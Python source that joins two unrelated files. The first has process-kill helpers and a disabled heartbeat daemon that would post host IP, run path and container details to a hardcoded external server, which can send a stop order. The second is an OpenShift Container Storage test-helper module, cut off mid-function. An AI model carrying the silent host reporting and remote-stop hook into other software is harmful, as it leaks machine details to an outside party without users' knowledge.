def kill_process(p):
    """Terminate *p* gracefully, escalating to kill() if it ignores terminate().

    Args:
        p: a psutil.Process (anything accepted by psutil.wait_procs).

    Best-effort cleanup: any exception is printed and swallowed on purpose
    so this never raises into the caller.
    """
    try:
        p.terminate()
        _, alive = psutil.wait_procs([p], timeout=0.1)  # first wait 100 ms
        if len(alive):
            _, alive = psutil.wait_procs(alive, timeout=3.0)  # then wait up to 3 s
            if len(alive):
                # Process ignored the terminate signal: force-kill survivors.
                # Fix: the original loop reused the name `p` here, shadowing
                # the function parameter.
                for survivor in alive:
                    survivor.kill()
    except Exception as e:
        print(e)
def kill_process_and_its_children(p):
    """Recursively terminate *p* together with every descendant process."""
    # Accept either a multiprocessing.Process or a psutil.Process.
    p = psutil.Process(p.pid)
    for child in p.children():
        # Recurse when the child has its own subtree, otherwise kill it directly.
        if hasattr(child, 'children') and len(child.children()) > 0:
            kill_process_and_its_children(child)
        else:
            kill_process(child)
    kill_process(p)
def kill_process_children(p):
    """Terminate every descendant of *p*, but leave *p* itself running."""
    # Accept either a multiprocessing.Process or a psutil.Process.
    p = psutil.Process(p.pid)
    for child in p.children():
        # Subtrees are removed recursively; leaves are killed directly.
        if hasattr(child, 'children') and len(child.children()) > 0:
            kill_process_and_its_children(child)
        else:
            kill_process(child)
def clean_child_process(pid):
    """Kill every child of the process identified by *pid* (not the process itself)."""
    kill_process_children(psutil.Process(pid))
def hmp_clean_up():
    """Exit hook: optionally upload experiment results, then kill all child processes."""
    # NOTE(review): imported inside the function, presumably to defer config
    # loading until cleanup time — confirm.
    from UTILS.exp_upload import upload_experiment_results
    from config import GlobalConfig as cfg
    print亮黄('[main.py] upload results to storage server via SSH')
    if cfg.allow_res_upload: upload_experiment_results(cfg)
    print亮黄('[main.py] kill all children process, then self-terminate.')
    # Kill every child of the current process (self keeps running).
    clean_child_process(os.getpid())
def start_periodic_daemon(cfg):
    """Spawn the background heartbeat thread (currently short-circuited for debugging).

    NOTE: the early `return` below deliberately disables the daemon; the code
    after it is intentionally kept but unreachable until the return is removed.
    """
    print('[hmp_daemon.py] Disable periodic daemon to debug.')
    return
    periodic_thread = threading.Thread(target=periodic_daemon, args=(cfg,))
    # Fix: Thread.setDaemon() is deprecated since Python 3.10 — assign the
    # `daemon` attribute instead (same effect: thread dies with the process).
    periodic_thread.daemon = True
    periodic_thread.start()
    for i in range(100):
        time.sleep(1)
        print(i)
    atexit.register(hmp_clean_up)
def periodic_daemon(cfg):
    """Heartbeat loop: call periodic_daemon_(cfg) every 15 minutes.

    AssertionError from periodic_daemon_ is the server's terminate signal:
    it triggers hmp_clean_up() and the loop then continues. Any other
    failure prints a message and stops the loop for good.
    """
    while True:
        try:
            print('start periodic_daemon_(cfg)')
            periodic_daemon_(cfg)
            print('end periodic_daemon_(cfg)')
        except AssertionError:
            # Server asked us to stop: upload results / kill children.
            hmp_clean_up()
        except BaseException:
            # NOTE(review): BaseException also swallows KeyboardInterrupt /
            # SystemExit raised in this thread — presumably intentional, confirm.
            print('hmp server failed')
            break
        time.sleep(15*60)
def periodic_daemon_(cfg):
    """Send one heartbeat report to the HMP center server.

    Raises:
        AssertionError: the server replied 'Stop_Now'; the caller
            (periodic_daemon) treats this as the terminate signal.
    """
    report = {
        'type': 'hmp-client',
        'note': cfg.note,
        'time': time.strftime("%Y-%m-%d-%H:%M:%S", time.localtime()),
        'client_status': 'Running',
        'StartingTime': cfg.machine_info['StartDateTime'],
        'HostIP': cfg.machine_info['HostIP'],
        'ExpUUID': cfg.machine_info['ExpUUID'],
        'RunPath': cfg.machine_info['RunPath'],
        'DockerContainerHash': cfg.machine_info['DockerContainerHash']
    }
    # Fix: requests.post() without a timeout can block this thread forever;
    # bound each heartbeat so a dead server surfaces as an exception (which
    # the caller already handles) instead of a silent hang.
    res = requests.post('http://linux.ipv4.fuqingxu.top:11511/', data=report, timeout=60)
    if res.text == 'Stop_Now':
        # Acknowledge the stop order before raising the terminate signal.
        report['client_status'] = 'Terminate'
        requests.post('http://linux.ipv4.fuqingxu.top:11511/', data=report, timeout=60)
        raise AssertionError('HMP-Center Has Given Terminate Signal!')
helpers.py | """
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
# Module-level logger, per ocs-ci convention.
logger = logging.getLogger(__name__)

# Timestamp format used by this module.
# NOTE(review): the literal "I" after %Y looks unusual — confirm it matches
# the timestamps actually being produced/parsed before "fixing" it.
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
    """
    Create a unique object name from the description, the type and a
    random uuid4 hex suffix.

    Fix (documentation): the original docstring claimed the name is trimmed
    to the Kubernetes 63-character limit, but the code trims to 40. The
    result is at most 40 characters (well under the 63-character limit,
    leaving headroom for suffixes added by controllers); the description
    contributes at most its first 23 characters.

    Args:
        resource_description (str): The user provided object description
        resource_type (str): The type of object for which the unique name
            will be created. For example: project, pvc, etc

    Returns:
        str: A unique name of at most 40 characters
    """
    name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
    return name if len(name) < 40 else name[:40]
def create_resource(do_reload=True, **kwargs):
    """Instantiate an OCS resource from *kwargs* and create it on the cluster.

    Args:
        do_reload (bool): reload the resource object after creation
        kwargs (dict): resource definition (must contain metadata.name)

    Returns:
        OCS: the created resource instance

    Raises:
        AssertionError: if the create call reports failure
    """
    ocs_obj = OCS(**kwargs)
    resource_name = kwargs.get("metadata").get("name")
    assert ocs_obj.create(
        do_reload=do_reload
    ), f"Failed to create resource {resource_name}"
    return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
    """Block until *resource* reaches *state*, or fail after *timeout* seconds.

    Default StorageClasses are skipped entirely (assumed already in place).

    Args:
        resource (OCS obj): The resource object
        state (str): The status to wait for
        timeout (int): Time in seconds to wait

    Raises:
        ResourceWrongStatusException: desired state not reached in time
    """
    default_names = (
        constants.DEFAULT_STORAGECLASS_CEPHFS,
        constants.DEFAULT_STORAGECLASS_RBD,
    )
    if resource.name in default_names:
        logger.info("Attempt to default default Secret or StorageClass")
        return
    try:
        resource.ocp.wait_for_resource(
            condition=state, resource_name=resource.name, timeout=timeout
        )
    except TimeoutExpiredError:
        logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
        resource.reload()
        raise ResourceWrongStatusException(resource.name, resource.describe())
    logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
    interface_type=None,
    pvc_name=None,
    do_reload=True,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    node_name=None,
    pod_dict_path=None,
    sa_name=None,
    dc_deployment=False,
    raw_block_pv=False,
    raw_block_device=constants.RAW_BLOCK_DEVICE,
    replica_count=1,
    pod_name=None,
    node_selector=None,
    command=None,
    command_args=None,
    deploy_pod_status=constants.STATUS_COMPLETED,
    subpath=None,
):
    """
    Create a pod

    Args:
        interface_type (str): The interface type (CephFS, RBD, etc.)
        pvc_name (str): The PVC that should be attached to the newly created pod
        do_reload (bool): True for reloading the object after creation, False otherwise
        namespace (str): The namespace for the new resource creation
        node_name (str): The name of specific node to schedule the pod
        pod_dict_path (str): YAML path for the pod
        sa_name (str): Serviceaccount name
        dc_deployment (bool): True if creating pod as deploymentconfig
        raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
        raw_block_device (str): raw block device for the pod
        replica_count (int): Replica count for deployment config
        pod_name (str): Name of the pod to create
        node_selector (dict): dict of key-value pair to be used for nodeSelector field
            eg: {'nodetype': 'app-pod'}
        command (list): The command to be executed on the pod
        command_args (list): The arguments to be sent to the command running
            on the pod
        deploy_pod_status (str): Expected status of deploy pod. Applicable
            only if dc_deployment is True
        subpath (str): Value of subPath parameter in pod yaml

    Returns:
        Pod: A Pod instance

    Raises:
        AssertionError: In case of any failure
    """
    # Pick the base YAML template and interface label; a DC deployment
    # overrides the template with the Fedora DC YAML regardless of interface.
    if (
        interface_type == constants.CEPHBLOCKPOOL
        or interface_type == constants.CEPHBLOCKPOOL_THICK
    ):
        pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
        interface = constants.RBD_INTERFACE
    else:
        pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
        interface = constants.CEPHFS_INTERFACE
    if dc_deployment:
        pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
    pod_data = templating.load_yaml(pod_dict)
    if not pod_name:
        pod_name = create_unique_resource_name(f"test-{interface}", "pod")
    pod_data["metadata"]["name"] = pod_name
    pod_data["metadata"]["namespace"] = namespace
    if dc_deployment:
        # DC templates nest the pod spec under spec.template.
        pod_data["metadata"]["labels"]["app"] = pod_name
        pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
        pod_data["spec"]["replicas"] = replica_count
    if pvc_name:
        # Attach the PVC to the (first) volume of the template.
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
                "claimName"
            ] = pvc_name
        else:
            pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
                "claimName"
            ] = pvc_name
    # For raw block PVs the volumeMounts entry must become a volumeDevices
    # entry; the exact surgery depends on which template is in use.
    if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
        if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
            temp_dict = [
                {
                    "devicePath": raw_block_device,
                    "name": pod_data.get("spec")
                    .get("template")
                    .get("spec")
                    .get("volumes")[0]
                    .get("name"),
                }
            ]
            if pod_dict_path == constants.FEDORA_DC_YAML:
                del pod_data["spec"]["template"]["spec"]["containers"][0][
                    "volumeMounts"
                ]
                security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
                pod_data["spec"]["template"]["spec"]["containers"][0][
                    "securityContext"
                ] = security_context
            pod_data["spec"]["template"]["spec"]["containers"][0][
                "volumeDevices"
            ] = temp_dict
        elif (
            pod_dict_path == constants.NGINX_POD_YAML
            or pod_dict == constants.CSI_RBD_POD_YAML
        ):
            temp_dict = [
                {
                    "devicePath": raw_block_device,
                    "name": pod_data.get("spec")
                    .get("containers")[0]
                    .get("volumeMounts")[0]
                    .get("name"),
                }
            ]
            del pod_data["spec"]["containers"][0]["volumeMounts"]
            pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
        else:
            # Template already carries a volumeDevices entry; just point it
            # at the requested device path and volume name.
            pod_data["spec"]["containers"][0]["volumeDevices"][0][
                "devicePath"
            ] = raw_block_device
            pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
                pod_data.get("spec").get("volumes")[0].get("name")
            )
    if command:
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
        else:
            pod_data["spec"]["containers"][0]["command"] = command
    if command_args:
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
        else:
            pod_data["spec"]["containers"][0]["args"] = command_args
    if node_name:
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
        else:
            pod_data["spec"]["nodeName"] = node_name
    if node_selector:
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
        else:
            pod_data["spec"]["nodeSelector"] = node_selector
    if sa_name and dc_deployment:
        pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
    if subpath:
        if dc_deployment:
            pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
                "subPath"
            ] = subpath
        else:
            pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
    # overwrite used image (required for disconnected installation)
    update_container_with_mirrored_image(pod_data)
    # configure http[s]_proxy env variable, if required
    update_container_with_proxy_env(pod_data)
    if dc_deployment:
        ocs_obj = create_resource(**pod_data)
        logger.info(ocs_obj.name)
        # Wait for the "<name>-1-deploy" deployer pod to finish (count drops
        # to 0 in the expected status), then return the actual app pod.
        assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
            condition=deploy_pod_status,
            resource_name=pod_name + "-1-deploy",
            resource_count=0,
            timeout=360,
            sleep=3,
        )
        dpod_list = pod.get_all_pods(namespace=namespace)
        for dpod in dpod_list:
            if "-1-deploy" not in dpod.name:
                if pod_name in dpod.name:
                    return dpod
        # NOTE(review): if no matching pod is found this falls through and
        # returns None — callers presumably rely on the assert above.
    else:
        pod_obj = pod.Pod(**pod_data)
        pod_name = pod_data.get("metadata").get("name")
        logger.info(f"Creating new Pod {pod_name} for test")
        created_resource = pod_obj.create(do_reload=do_reload)
        assert created_resource, f"Failed to create Pod {pod_name}"
        return pod_obj
def create_project(project_name=None):
    """Create a new project (namespace).

    Args:
        project_name (str): desired name; a unique one is generated when None

    Returns:
        ocs_ci.ocs.ocp.OCP: Project object
    """
    namespace = project_name or create_unique_resource_name("test", "namespace")
    project_obj = ocp.OCP(kind="Project", namespace=namespace)
    created = project_obj.new_project(namespace)
    assert created, f"Failed to create namespace {namespace}"
    return project_obj
def create_multilpe_projects(number_of_project):
    """Create one or more uniquely-named projects.

    (The misspelled function name is kept for backward compatibility.)

    Args:
        number_of_project (int): Number of projects to be created

    Returns:
        list: List of project objects
    """
    return [create_project() for _ in range(number_of_project)]
def create_secret(interface_type):
    """Create a CSI secret for the given interface.

    ** This method should not be used anymore **
    ** This method is for internal testing only **

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)

    Returns:
        OCS: An OCS instance for the secret
    """
    secret_data = dict()
    if interface_type == constants.CEPHBLOCKPOOL:
        interface = constants.RBD_INTERFACE
        secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
        secret_data["stringData"]["userID"] = constants.ADMIN_USER
        secret_data["stringData"]["userKey"] = get_admin_key()
    elif interface_type == constants.CEPHFILESYSTEM:
        interface = constants.CEPHFS_INTERFACE
        secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
        # The CephFS template ships user* keys; replace them with admin* ones.
        del secret_data["stringData"]["userID"]
        del secret_data["stringData"]["userKey"]
        secret_data["stringData"]["adminID"] = constants.ADMIN_USER
        secret_data["stringData"]["adminKey"] = get_admin_key()
    secret_data["metadata"]["name"] = create_unique_resource_name(
        f"test-{interface}", "secret"
    )
    secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
    return create_resource(**secret_data)
def default_ceph_block_pool():
    """Return the name of the pool backing the default RBD StorageClass.

    Returns:
        str: pool name (falls back to constants.DEFAULT_BLOCKPOOL)
    """
    sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
    pool = sc_obj.get().get("parameters").get("pool")
    return pool or constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
    pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
    """Create a CephBlockPool CR.

    ** This method should not be used anymore **
    ** This method is for internal testing only **

    Args:
        pool_name (str): The pool name to create (unique name generated when None)
        replica (int): The replica size for a pool
        compression (str): Compression type for a pool
        failure_domain (str): Failure domain name (autodetected when None)
        verify (bool): True to verify the pool exists after creation,
            False otherwise

    Returns:
        OCS: An OCS instance for the Ceph block pool
    """
    cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
    cbp_data["metadata"]["name"] = pool_name or create_unique_resource_name(
        "test", "cbp"
    )
    cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
    cbp_data["spec"]["replicated"]["size"] = replica
    cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
    if compression:
        cbp_data["spec"]["compressionMode"] = compression
        cbp_data["spec"]["parameters"]["compression_mode"] = compression
    cbp_obj = create_resource(**cbp_data)
    cbp_obj.reload()
    if verify:
        assert verify_block_pool_exists(
            cbp_obj.name
        ), f"Block pool {cbp_obj.name} does not exist"
    return cbp_obj
def create_ceph_file_system(pool_name=None):
    """Create a CephFileSystem CR and validate it on both OCP and Ceph sides.

    ** This method should not be used anymore **
    ** This method is for internal testing only **

    Args:
        pool_name (str): The pool name to create (unique name generated when None)

    Returns:
        OCS: An OCS instance for the Ceph file system
    """
    fs_spec = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
    fs_spec["metadata"]["name"] = pool_name or create_unique_resource_name(
        "test", "cfs"
    )
    fs_spec["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
    fs_obj = create_resource(**fs_spec)
    fs_obj.reload()
    assert validate_cephfilesystem(
        fs_obj.name
    ), f"File system {fs_obj.name} does not exist"
    return fs_obj
def default_storage_class(
    interface_type,
):
    """Return the default StorageClass for *interface_type*.

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)

    Returns:
        OCS: Existing StorageClass Instance
    """
    external = config.DEPLOYMENT["external_mode"]
    if interface_type == constants.CEPHBLOCKPOOL:
        resource_name = (
            constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
            if external
            else constants.DEFAULT_STORAGECLASS_RBD
        )
        base_sc = OCP(kind="storageclass", resource_name=resource_name)
    elif interface_type == constants.CEPHFILESYSTEM:
        resource_name = (
            constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
            if external
            else constants.DEFAULT_STORAGECLASS_CEPHFS
        )
        base_sc = OCP(kind="storageclass", resource_name=resource_name)
    # NOTE(review): an unsupported interface_type leaves base_sc unbound and
    # raises NameError below — callers presumably always pass one of the two.
    base_sc.wait_for_resource(
        condition=resource_name,
        column="NAME",
        timeout=240,
    )
    return OCS(**base_sc.data)
def default_thick_storage_class():
    """Return the default RBD thick-provisioning StorageClass.

    Returns:
        OCS: Existing RBD thick StorageClass instance
    """
    if config.DEPLOYMENT["external_mode"]:
        resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
    else:
        resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
    base_sc = OCP(kind="storageclass", resource_name=resource_name)
    return OCS(**base_sc.data)
def create_storage_class(
    interface_type,
    interface_name,
    secret_name,
    reclaim_policy=constants.RECLAIM_POLICY_DELETE,
    sc_name=None,
    provisioner=None,
    rbd_thick_provision=False,
    encrypted=False,
    encryption_kms_id=None,
    fs_name=None,
):
    """
    Create a storage class

    ** This method should not be used anymore **
    ** This method is for internal testing only **

    Args:
        interface_type (str): The type of the interface
            (e.g. CephBlockPool, CephFileSystem)
        interface_name (str): The name of the interface
        secret_name (str): The name of the secret
        sc_name (str): The name of storage class to create
        reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
            (eg., 'Delete', 'Retain')
        provisioner (str): provisioner name; interface default used when None
        rbd_thick_provision (bool): True to enable RBD thick provisioning.
            Applicable if interface_type is CephBlockPool
        encrypted (bool): True to create encrypted SC else False
        encryption_kms_id (str): ID of the KMS entry from connection details
        fs_name (str): the name of the filesystem for CephFS StorageClass

    Returns:
        OCS: An OCS instance for the storage class
    """
    # Map interface -> StorageClass YAML template.
    yamls = {
        constants.CEPHBLOCKPOOL: constants.CSI_RBD_STORAGECLASS_YAML,
        constants.CEPHFILESYSTEM: constants.CSI_CEPHFS_STORAGECLASS_YAML,
    }
    sc_data = dict()
    sc_data = templating.load_yaml(yamls[interface_type])

    # Interface-specific fields: provisioner, thick provisioning, encryption
    # (RBD) or the backing filesystem name (CephFS).
    if interface_type == constants.CEPHBLOCKPOOL:
        interface = constants.RBD_INTERFACE
        sc_data["provisioner"] = (
            provisioner if provisioner else defaults.RBD_PROVISIONER
        )
        if rbd_thick_provision:
            sc_data["parameters"]["thickProvision"] = "true"
        if encrypted:
            # Avoid circular imports
            from ocs_ci.utility.kms import get_encryption_kmsid

            sc_data["parameters"]["encrypted"] = "true"
            sc_data["parameters"]["encryptionKMSID"] = (
                encryption_kms_id if encryption_kms_id else get_encryption_kmsid()[0]
            )
    elif interface_type == constants.CEPHFILESYSTEM:
        interface = constants.CEPHFS_INTERFACE
        sc_data["parameters"]["fsName"] = fs_name if fs_name else get_cephfs_name()
        sc_data["provisioner"] = (
            provisioner if provisioner else defaults.CEPHFS_PROVISIONER
        )
    sc_data["parameters"]["pool"] = interface_name

    sc_data["metadata"]["name"] = (
        sc_name
        if sc_name
        else create_unique_resource_name(f"test-{interface}", "storageclass")
    )
    sc_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
    # Point all three CSI secret references at the same secret/namespace.
    for key in ["node-stage", "provisioner", "controller-expand"]:
        sc_data["parameters"][f"csi.storage.k8s.io/{key}-secret-name"] = secret_name
        sc_data["parameters"][
            f"csi.storage.k8s.io/{key}-secret-namespace"
        ] = defaults.ROOK_CLUSTER_NAMESPACE

    sc_data["parameters"]["clusterID"] = defaults.ROOK_CLUSTER_NAMESPACE
    sc_data["reclaimPolicy"] = reclaim_policy

    # Drop the legacy 'userid' parameter if the template still carries it.
    try:
        del sc_data["parameters"]["userid"]
    except KeyError:
        pass
    return create_resource(**sc_data)
def create_pvc(
    sc_name,
    pvc_name=None,
    namespace=defaults.ROOK_CLUSTER_NAMESPACE,
    size=None,
    do_reload=True,
    access_mode=constants.ACCESS_MODE_RWO,
    volume_mode=None,
):
    """Create a single PVC bound to the given StorageClass.

    Args:
        sc_name (str): The name of the storage class for the PVC to be
            associated with
        pvc_name (str): The name of the PVC to create (unique name when None)
        namespace (str): The namespace for the PVC creation
        size (str): Size of pvc to create
        do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
        access_mode (str): The access mode to be used for the PVC
        volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'

    Returns:
        PVC: PVC instance
    """
    pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
    pvc_data["metadata"]["name"] = pvc_name or create_unique_resource_name(
        "test", "pvc"
    )
    pvc_data["metadata"]["namespace"] = namespace
    pvc_data["spec"]["accessModes"] = [access_mode]
    pvc_data["spec"]["storageClassName"] = sc_name
    if size:
        pvc_data["spec"]["resources"]["requests"]["storage"] = size
    if volume_mode:
        pvc_data["spec"]["volumeMode"] = volume_mode
    ocs_obj = pvc.PVC(**pvc_data)
    created = ocs_obj.create(do_reload=do_reload)
    assert created, f"Failed to create resource {pvc_name}"
    return ocs_obj
def create_multiple_pvcs(
    sc_name,
    namespace,
    number_of_pvc=1,
    size=None,
    do_reload=False,
    access_mode=constants.ACCESS_MODE_RWO,
    burst=False,
):
    """
    Create one or more PVC as a bulk or one by one

    Args:
        sc_name (str): The name of the storage class to provision the PVCs from
        namespace (str): The namespace for the PVCs creation
        number_of_pvc (int): Number of PVCs to be created
        size (str): The size of the PVCs to create
        do_reload (bool): True for wait for reloading PVC after its creation,
            False otherwise
        access_mode (str): The kind of access mode for PVC
        burst (bool): True for bulk creation, False ( default) for multiple creation

    Returns:
        ocs_objs (list): List of PVC objects
        tmpdir (str): The full path of the directory in which the yamls for
            pvc objects creation reside (burst mode only; non-burst returns
            just the list)
    """
    if not burst:
        # One-by-one path: RWX on RBD requires Block volume mode.
        if access_mode == "ReadWriteMany" and "rbd" in sc_name:
            volume_mode = "Block"
        else:
            volume_mode = None
        return [
            create_pvc(
                sc_name=sc_name,
                size=size,
                namespace=namespace,
                do_reload=do_reload,
                access_mode=access_mode,
                volume_mode=volume_mode,
            )
            for _ in range(number_of_pvc)
        ]

    # Burst path: build one shared template, dump N yaml files, then create
    # them all with a single `oc create -f <dir>`.
    pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
    pvc_data["metadata"]["namespace"] = namespace
    pvc_data["spec"]["accessModes"] = [access_mode]
    pvc_data["spec"]["storageClassName"] = sc_name
    if size:
        pvc_data["spec"]["resources"]["requests"]["storage"] = size
    if access_mode == "ReadWriteMany" and "rbd" in sc_name:
        pvc_data["spec"]["volumeMode"] = "Block"
    else:
        # NOTE(review): this sets volumeMode to an explicit None (rendered as
        # null in the yaml) rather than removing the key — confirm intended.
        pvc_data["spec"]["volumeMode"] = None

    # Creating temp directory to hold the files for the PVC creation
    tmpdir = tempfile.mkdtemp()
    logger.info("Creating the PVC yaml files for creation in bulk")
    ocs_objs = []
    for _ in range(number_of_pvc):
        name = create_unique_resource_name("test", "pvc")
        logger.info(f"Adding PVC with name {name}")
        pvc_data["metadata"]["name"] = name
        templating.dump_data_to_temp_yaml(pvc_data, f"{tmpdir}/{name}.yaml")
        ocs_objs.append(pvc.PVC(**pvc_data))

    logger.info("Creating all PVCs as bulk")
    oc = OCP(kind="pod", namespace=namespace)
    cmd = f"create -f {tmpdir}/"
    oc.exec_oc_cmd(command=cmd, out_yaml_format=False)

    # Letting the system 1 sec for each PVC to create.
    # this will prevent any other command from running in the system in this
    # period of time.
    logger.info(
        f"Going to sleep for {number_of_pvc} sec. "
        "until starting verify that PVCs was created."
    )
    time.sleep(number_of_pvc)

    return ocs_objs, tmpdir
def delete_bulk_pvcs(pvc_yaml_dir, pv_names_list, namespace):
    """
    Deletes all the pvcs created from yaml file in a provided dir

    Args:
        pvc_yaml_dir (str): Directory in which yaml file resides
        pv_names_list (str): List of pv objects to be deleted
        namespace (str): Namespace the PVCs were created in
    """
    oc = OCP(kind="pod", namespace=namespace)
    cmd = f"delete -f {pvc_yaml_dir}/"
    oc.exec_oc_cmd(command=cmd, out_yaml_format=False)
    # Rough pacing: allow ~0.5 s per PV before validating the deletions.
    time.sleep(len(pv_names_list) / 2)
    for pv_name in pv_names_list:
        validate_pv_delete(pv_name)
def verify_block_pool_exists(pool_name):
    """Return True once *pool_name* shows up in `ceph osd lspools` (60 s budget).

    Args:
        pool_name (str): The name of the Ceph block pool

    Returns:
        bool: True if the Ceph block pool exists, False otherwise
    """
    logger.info(f"Verifying that block pool {pool_name} exists")
    ct_pod = pod.get_ceph_tools_pod()
    # Re-run `ceph osd lspools` every 3 s for up to 60 s.
    sampler = TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph osd lspools")
    try:
        for pools in sampler:
            logger.info(f"POOLS are {pools}")
            if any(pool_name in entry.get("poolname") for entry in pools):
                return True
    except TimeoutExpiredError:
        return False
def get_pool_cr(pool_name):
    """
    Get the pool CR even if the kind is unknown.

    Tries the name first as a CephBlockPool, then as a CephFilesystem.

    Args:
        pool_name (str): The name of the pool to get the CR for.

    Returns:
        dict: If the resource is found, None otherwise.
    """
    logger.info(f"Checking if pool {pool_name} is kind of {constants.CEPHBLOCKPOOL}")
    ocp_kind_cephblockpool = ocp.OCP(
        kind=constants.CEPHBLOCKPOOL, namespace=config.ENV_DATA["cluster_namespace"]
    )
    pool_cr = ocp_kind_cephblockpool.get(resource_name=pool_name, dont_raise=True)
    if pool_cr is not None:
        return pool_cr
    # Fix: log-message typo "checkging" -> "checking".
    logger.info(
        f"Pool {pool_name} is not kind={constants.CEPHBLOCKPOOL}"
        f", checking if it is kind={constants.CEPHFILESYSTEM}"
    )
    ocp_kind_cephfilesystem = ocp.OCP(
        kind="CephFilesystem",
        namespace=config.ENV_DATA["cluster_namespace"],
    )
    return ocp_kind_cephfilesystem.get(resource_name=pool_name, dont_raise=True)
def get_admin_key():
    """Fetch the client.admin key from Ceph via the tools pod.

    Returns:
        str: The admin key
    """
    tools_pod = pod.get_ceph_tools_pod()
    return tools_pod.exec_ceph_cmd("ceph auth get-key client.admin")["key"]
def get_cephfs_data_pool_name():
    """Return the first data pool name of the first CephFS filesystem.

    Returns:
        str: fs datapool name
    """
    tools_pod = pod.get_ceph_tools_pod()
    fs_listing = tools_pod.exec_ceph_cmd("ceph fs ls")
    return fs_listing[0]["data_pools"][0]
def validate_cephfilesystem(fs_name):
    """
    Verify a CephFileSystem exists on both the OCP side and the Ceph side.

    Args:
        fs_name (str): The name of the Ceph FileSystem

    Returns:
        bool: True if the filesystem is visible both in OCP and in
            `ceph fs ls`, False otherwise
    """
    cfs = ocp.OCP(
        kind=constants.CEPHFILESYSTEM, namespace=defaults.ROOK_CLUSTER_NAMESPACE
    )
    ct_pod = pod.get_ceph_tools_pod()
    ceph_validate = False
    ocp_validate = False

    result = cfs.get(resource_name=fs_name)
    if result.get("metadata").get("name"):
        logger.info("Filesystem %s got created from Openshift Side", fs_name)
        ocp_validate = True
    else:
        # Fix: log-message grammar ("was not create" -> "was not created").
        logger.info("Filesystem %s was not created at Openshift Side", fs_name)
        return False

    # Poll `ceph fs ls` every 3 s for up to 60 s until the fs appears.
    try:
        for pools in TimeoutSampler(60, 3, ct_pod.exec_ceph_cmd, "ceph fs ls"):
            for out in pools:
                if out.get("name") == fs_name:
                    logger.info("FileSystem %s got created from Ceph Side", fs_name)
                    ceph_validate = True
                    break
                else:
                    logger.error("FileSystem %s was not present at Ceph Side", fs_name)
                    ceph_validate = False
            if ceph_validate:
                break
    except TimeoutExpiredError:
        pass

    # Fix: simplified non-idiomatic `True if (...) else False`.
    return ceph_validate and ocp_validate
def create_ocs_object_from_kind_and_name(
    kind, resource_name, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
):
    """Fetch a live resource and wrap it in an OCS object.

    Args:
